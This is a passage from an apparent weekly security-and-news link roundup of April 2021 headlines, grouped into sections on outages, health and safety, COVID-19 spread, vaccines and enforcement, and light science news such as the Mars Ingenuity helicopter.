- (Software upgrade gone wrong) Rogers is down: Canadian users report voice and data outages https://www.bleepingcomputer.com/news/mobile/rogers-is-down-canadian-users-report-voice-and-data-outages/
- (A uniquely Canadian outage) Beavers chew through 4.5-inch thick tube, disrupting internet service for 900 B.C. customers https://bc.ctvnews.ca/beavers-chew-through-4-5-inch-thick-tube-disrupting-internet-service-for-900-b-c-customers-1.5401615
- Canada's aging critical infrastructure strategy an increasing concern, say cybersecurity experts https://ottawacitizen.com/news/canada/canadas-aging-critical-infrastructure-an-increasing-concern-say-cybersecurity-experts/wcm/861aceef-c292-437c-a0ed-9707acd24cee
- The Big Pentagon Internet Mystery Now Partially Solved https://www.securityweek.com/big-pentagon-internet-mystery-now-partially-solved
- How many layers of copyright infringement are in Emily Ratajkowski’s new NFT? https://www.theverge.com/2021/4/24/22399790/emily-ratajkowski-nft-christies-copyright-nightmare-richard-prince
- Stranded sailor allowed to leave abandoned ship after four years https://www.bbc.co.uk/news/world-middle-east-56842506
- They Hacked McDonald’s Ice Cream Machines—and Started a Cold War https://www.wired.com/story/they-hacked-mcdonalds-ice-cream-makers-started-cold-war
- Italian hospital employee accused of skipping work for 15 years https://www.bbc.co.uk/news/world-europe-56822571
Health, Safety & Environment:
- How lessons from past emergencies could improve the pandemic response https://scienmag.com/how-lessons-from-past-emergencies-could-improve-the-pandemic-response/
- Malaria vaccine hailed as potential breakthrough https://www.bbc.co.uk/news/health-56858158
- Federal oversight of natural health products leaving Canadians at risk: report https://globalnews.ca/news/7783257/federal-oversight-canadian-natural-health-products/
- Chernobyl radiation damage 'not passed to children' https://www.bbc.co.uk/news/science-environment-56846728
- Disgusting Study Shows What Happens in The Air When You Flush a Public Toilet https://www.sciencealert.com/horrifying-study-shows-why-you-shouldn-t-linger-when-you-flush-a-public-toilet
- Does listening to calming music at bedtime actually help you sleep? https://scienmag.com/does-listening-to-calming-music-at-bedtime-actually-help-you-sleep/
- US aviation regulator warns of mid-air collision risk if Garmin TCAS boxes are not updated https://www.theregister.com/2021/04/22/garmin_tcas_software_collision_risks_faa/
- Why the Fire Pole Is Beginning to Disappear https://www.mentalfloss.com/article/643965/fire-pole-history-facts
- Saskatchewan’s workplace total injury rate decreased by 10% in 2020: WCB https://globalnews.ca/news/7778378/saskatchewan-workplace-injury-rate-decreased-2020-wcb/
- Peloton treadmill accidents spark push to change product safety law https://www.theverge.com/2021/4/22/22397884/peloton-treadmill-accident-hazard-cpsc-democrats-congress-consumer-safety
- Firearms laws curb rates of gun violence across United States https://scienmag.com/firearms-laws-curb-rates-of-gun-violence-across-united-states/
- Woman’s eye glued shut after mistaking nail glue for eyedrops https://globalnews.ca/news/7783137/woman-eye-glue-eyedrops-superglue-contact-lenses/
- Explosive gender reveal party shakes houses miles away https://www.bbc.co.uk/news/newsbeat-56861212
- Space junk map tracks 200 ‘ticking time bombs’ https://www.bbc.co.uk/news/science-environment-56845104
- SpaceX says OneWeb spread false story of “near-miss” satellite collision https://arstechnica.com/information-technology/2021/04/spacex-says-oneweb-spread-false-story-of-near-miss-satellite-collision/
- Plastics Can Be Broken Down Into Fuel, And We Just Found a Great Method For It https://www.sciencealert.com/scientists-create-a-better-way-to-break-down-plastics-into-fuel
- X-Prize Winners Use CO2 Emissions to Make Concrete https://www.scientificamerican.com/article/x-prize-winners-use-co2-emissions-to-make-concrete/
- Climate change: Carbon 'surge' expected in post-Covid energy boom https://www.bbc.co.uk/news/science-environment-56805255
- How bad are NFTs for the environment? https://www.independent.co.uk/climate-change/sustainable-living/nft-environment-climate-change-crypto-b1835220.html
- Hawaii lawmakers just approved a measure to fine people $500 for intentionally releasing balloons into the atmosphere https://www.businessinsider.com/hawaii-moves-forward-to-fine-people-for-releasing-balloons-2021-4
COVID-19 updates.
COVID related articles. We have been following coronavirus risks since https://controlgap.com/blog/this-weeks-insecurity-issue-147.
- AI unlocks ancient Dead Sea Scrolls mystery https://www.bbc.co.uk/news/world-middle-east-56842712
- Algorithm Virtually Unfolds a Historical Letter without Unsealing It https://www.scientificamerican.com/article/algorithm-virtually-unfolds-a-historical-letter-without-unsealing-it/
The spread, curves, spikes, waves, reinfection, and variant strains:
- Canada surpasses 12 million COVID-19 vaccine jabs as rollout picks up speed https://globalnews.ca/news/7795994/covid-vaccines-12-million-canada-rollout/
- COVID-19 infections in Ontario shoot back up past 4,200, ICU admissions near 800 https://toronto.ctvnews.ca/covid-19-infections-in-ontario-shoot-back-up-past-4-200-icu-admissions-near-800-1.5396099
- Ontario reports 4,505 new COVID-19 cases, 34 deaths https://globalnews.ca/news/7782804/covid-19-ontario-coronavirus-cases-april-23/
- Rise in sudden COVID-19 deaths at home still a mystery, Ontario chief coroner says https://globalnews.ca/news/7784320/rise-in-sudden-covid-deaths-at-home-ontario/
- ‘Assume that they might have COVID’: Peel’s top doctor says after 22% test positivity in Brampton https://globalnews.ca/news/7776427/brampton-covid-test-positivity/
- ‘It’s over’: India COVID-19 patients suffocate as cases surge during oxygen shortage https://globalnews.ca/news/7786158/india-coronavirus-patients-oxyegen-shortage/
- India is shattering global COVID-19 infection rates. Here’s why https://globalnews.ca/news/7779609/india-covid-rates-explainer/
- India's Massive COVID Surge Puzzles Scientists https://www.scientificamerican.com/article/indias-massive-covid-surge-puzzles-scientists/
- Prince Albert ‘Freedom Rally’ attendees told to self-isolate after increased COVID-19 exposure https://globalnews.ca/news/7785832/self-isolation-covid-exposure-prince-albert-rally/
- Mount Everest: Coronavirus reaches world's tallest peak https://www.bbc.co.uk/news/world-asia-56854986
- A COVID triple-mutant found in India could be much more deadly, and may be resistant to existing vaccines https://www.businessinsider.com/covid-triple-mutant-in-india-could-be-much-more-deadly-2021-4
- There’s a new 'double mutant' COVID-19 variant in India. How worried should we be? https://nationalpost.com/news/world/theres-a-new-double-mutant-covid-19-variant-in-india-how-worried-should-we-be
- COVID-19 variant first detected in India found in Canada. What we know so far https://globalnews.ca/news/7780851/india-covid-variant-canada-cases/
Guidance, Response, and Recovery:
- No Digital Vaccine Bouncers https://www.eff.org/deeplinks/2021/04/no-digital-vaccine-bouncers
- Canada's border restrictions to remain in place another month, at least https://www.ctvnews.ca/canada/canada-s-border-restrictions-to-remain-in-place-another-month-at-least-1.5394551
- COMMENTARY: Canada’s response to coronavirus variants does not inspire confidence https://globalnews.ca/news/7785488/commentary-canada-response-coronavirus-variants/
- 'There's not a lot of give left in the system': ORNGE patient transfers surge to keep GTA hospitals afloat https://toronto.ctvnews.ca/there-s-not-a-lot-of-give-left-in-the-system-ornge-patient-transfers-surge-to-keep-gta-hospitals-afloat-1.5398072
- Ontario's science table calls for stronger measures to control COVID-19 pandemic https://toronto.ctvnews.ca/ontario-s-science-table-calls-for-stronger-measures-to-control-covid-19-pandemic-1.5395032
- One of Ontario's top scientific advisers says he considered quitting after latest COVID-19 restrictions https://www.ctvnews.ca/health/coronavirus/one-of-ontario-s-top-scientific-advisers-says-he-considered-quitting-after-latest-covid-19-restrictions-1.5394378
- Ontario's top doctor issues directive to cease all non-emergency surgeries immediately https://toronto.ctvnews.ca/ontario-s-top-doctor-issues-directive-to-cease-all-non-emergency-surgeries-immediately-1.5397319
- Infectious disease specialist cautions Edmontonians against visiting enclosed patio tents https://globalnews.ca/news/7781865/covid-19-infectious-disease-specialist-enclosed-patio-tents/
- U.S. upgrades Canada to ‘do not travel’ status amid soaring COVID-19 numbers https://globalnews.ca/news/7773469/covid-us-canada-travel-advisory/
- The UK's 'red list' now bars travel from India to contain the spread of COVID-19 variants. Here's what it means, which countries are on the list and how it works. https://www.businessinsider.com/india-on-uk-travel-red-list-covid-19-variant-cases-surge-2021-4
- Coronavirus: Japan declares virus emergency in Tokyo as Olympics near https://www.bbc.co.uk/news/world-asia-56864319
Immunity and Vaccinations:
- For Vaccine Passports, Less Tech Is Best https://www.nytimes.com/2021/04/20/technology/vaccine-passports-privacy.html
- Two Cases of COVID-19 'Vaccine Breakthrough' Infection Confirmed in The US https://www.sciencealert.com/two-cases-of-covid-19-vaccine-breakthrough-infection-have-been-confirmed
- Shifting more vaccines to hot spots will help reduce hospitalizations, deaths: Ontario science table https://globalnews.ca/news/7785537/ontario-science-table-more-covid-vaccines-hot-spots/
- What you can and can’t do once you’ve received your 1st COVID-19 vaccine dose https://globalnews.ca/news/7769047/what-canadians-can-do-covid-vaccination/
- AstraZeneca’s 1.5M COVID-19 shots from Baltimore plant are safe: Health Canada https://globalnews.ca/news/7788122/health-canada-astrazeneca-covid-vaccines/
- COVID-19: Ontario won’t lower AstraZeneca vaccine age threshold currently given limited supply https://globalnews.ca/news/7784138/ontario-astrazeneca-covid-vaccination-age/
- One dose of AstraZeneca or Pfizer's vaccine provides protection against COVID-19 that lasts at least 10 weeks https://www.businessinsider.com/one-dose-astrazeneca-or-pfizer-vaccine-protects-against-covid-19-2021-4
- CDC committee backs Johnson & Johnson COVID-19 vaccine https://www.theverge.com/2021/4/23/22399998/covid-vaccine-johnson-cdc-pause-clots-risk
- COVID-19: ‘Ring vaccination’ can teach us how to target limited supply https://globalnews.ca/news/7777204/covid-19-ring-vaccination-canada/
- Auditor general to review how COVID-19 vaccination hot spot postal codes were chosen https://toronto.ctvnews.ca/auditor-general-to-review-how-covid-19-vaccination-hot-spot-postal-codes-were-chosen-1.5394412
- Family of 97-year-old who just got COVID-19 vaccine fears all homebound seniors won't get shot until fall https://toronto.ctvnews.ca/family-of-97-year-old-who-just-got-covid-19-vaccine-fears-all-homebound-seniors-won-t-get-shot-until-fall-1.5396834
- Vaccination doesn’t mean a return to pre-COVID-19 lifestyle, Manitoba health official says https://globalnews.ca/news/7781383/vaccination-return-pre-covid-19-lifestyle-manitoba-health-official/
- Scientists uncover a molecule that can help coronavirus escape antibodies https://scienmag.com/scientists-uncover-a-molecule-that-can-help-coronavirus-escape-antibodies/
- Scientists unmask new neutralizing antibody target on SARS-CoV-2 spike protein https://scienmag.com/scientists-unmask-new-neutralizing-antibody-target-on-sars-cov-2-spike-protein/
Things we learned:
- Simple oral hygiene could help reduce COVID-19 severity – study https://scienmag.com/simple-oral-hygiene-could-help-reduce-covid-19-severity-study/
- Faster air exchange in buildings not always beneficial for coronavirus levels https://scienmag.com/faster-air-exchange-in-buildings-not-always-beneficial-for-coronavirus-levels/
- Covid: Scientists find more evidence of human-to-cat transmission https://www.bbc.co.uk/news/uk-scotland-glasgow-west-56821770
- ‘I couldn’t take it anymore’: Why some medical staff are calling it quits amid COVID-19 https://globalnews.ca/news/7782649/covid-19-medical-staff-mental-health/
More of the good, the bad, and the ugly:
- Coronavirus: Okanagan business bans people vaccinated against COVID-19 from entering https://globalnews.ca/news/7782133/coronavirus-okanagan-business-bans-people-vaccinated-against-covid-19-from-entering/
- Covid: Man arrested after infecting 22 people in Majorca https://www.bbc.co.uk/news/world-europe-56874018
Masks, anti-maskers, distancing, compliance, and repercussions:
- 100 people attend anti-mask children’s carnival in Saskatoon https://globalnews.ca/news/7787002/anti-mask-childrens-carnival-saskatoon/
- Kelowna anti-mask, anti-vaccine gym ordered closed https://globalnews.ca/news/7781036/covid-kelowna-gym-ordered-closed/
- More than 200 travellers arriving in Ontario have refused to stay in quarantine hotels https://toronto.ctvnews.ca/more-than-200-travellers-arriving-in-ontario-have-refused-to-stay-in-quarantine-hotels-1.5396802
- Ontario man charged after allegedly using fake COVID-19 document at Pearson Airport https://toronto.ctvnews.ca/ontario-man-charged-after-allegedly-using-fake-covid-19-document-at-pearson-airport-1.5396772
- Vancouver exploring legal action against health order-defying restaurant: Mayor https://globalnews.ca/news/7786567/corduroy-restaurant-vancouver-health-orders/
- COVID-19: 22 people charged for violating N.S. Health Protection Act https://globalnews.ca/news/7786134/n-s-health-protection-act-violations-covid-april-24/
- Numerous tickets issued after police break up large party in Toronto https://toronto.ctvnews.ca/numerous-tickets-issued-after-police-break-up-large-party-in-toronto-1.5401536
- Toronto police begin 'new enforcement approach' to stay-at-home order starting Thursday https://toronto.ctvnews.ca/toronto-police-begin-new-enforcement-approach-to-stay-at-home-order-starting-thursday-1.5397371
- Toronto police launching dedicated COVID-19 teams in each division to target large gatherings https://globalnews.ca/news/7779141/toronto-police-covid-enforcement-teams/
- 5 Ontarians from different addresses charged after riding in same car during stay-at-home order https://globalnews.ca/news/7777986/5-ontarians-different-addresses-charged-riding-same-car-covid-19/
- Some Queen’s students evicted from residence for COVID-19 non-compliance https://globalnews.ca/news/7780371/queens-covid-19-student-residence-evictions/
- This Biodegradable Face Mask Can Be Planted When You’re Done Using It https://www.mentalfloss.com/article/645839/biodegradable-face-mask-can-be-planted
Off-Topic / Science & Tech / Lighter Side
A variety of scientific, technical, historical, and more light-hearted news.
- 15 People Just Spent 40 Days in a Cave Without Phones, Clocks, or Sunlight https://www.sciencealert.com/15-volunteers-lived-in-a-cave-with-no-phones-clocks-or-sunlight-for-40-days
- Can You Train Yourself to Be a Morning Person if You're a Night Owl? https://www.sciencealert.com/can-you-train-yourself-to-be-a-morning-person-if-you-re-a-night-owl
- T. Rex liked to walk as slowly as humans do — at a leisurely 3 miles per hour (So much for Jurassic Park) https://www.businessinsider.com/t-rex-walking-speed-slow-similar-to-humans-study-2021-4
- When Dr. Demento Ruled the Airwaves https://www.mentalfloss.com/article/644173/dr-demento-ruled-radio
- In a technological first, NASA has made a sip of breathable air on Mars https://www.syfy.com/syfywire/in-a-technological-first-nasa-has-made-a-sip-of-breathable-air-on-mars
- “You Wouldn’t Believe What I Just Saw:” Ingenuity Helicopter Flies Successfully on Mars https://www.universetoday.com/150943/you-wouldnt-believe-what-i-just-saw-ingenuity-helicopter-flies-successfully-on-mars/
- Mars Ingenuity takes flight! https://www.syfy.com/syfywire/mars-ingenuity-takes-flight
- NASA's Mars Ingenuity Helicopter Completes Second Flight https://www.nytimes.com/2021/04/22/science/nasa-mars-helicopter-ingenuity.html
- Quantum Astronomy Could Create Telescopes Hundreds of Kilometers Wide https://www.scientificamerican.com/article/quantum-astronomy-could-create-telescopes-hundreds-of-kilometers-wide/
- Astronomers find an exoplanet where an exoplanet shouldn’t be https://www.syfy.com/syfywire/astronomers-find-an-exoplanet-where-an-exoplanet-shouldnt-be
- Astronomers Have Detected The Closest Black Hole to Earth. Thankfully, It's Tiny https://www.sciencealert.com/astronomers-have-detected-the-closest-black-hole-to-earth-and-it-s-really-tiny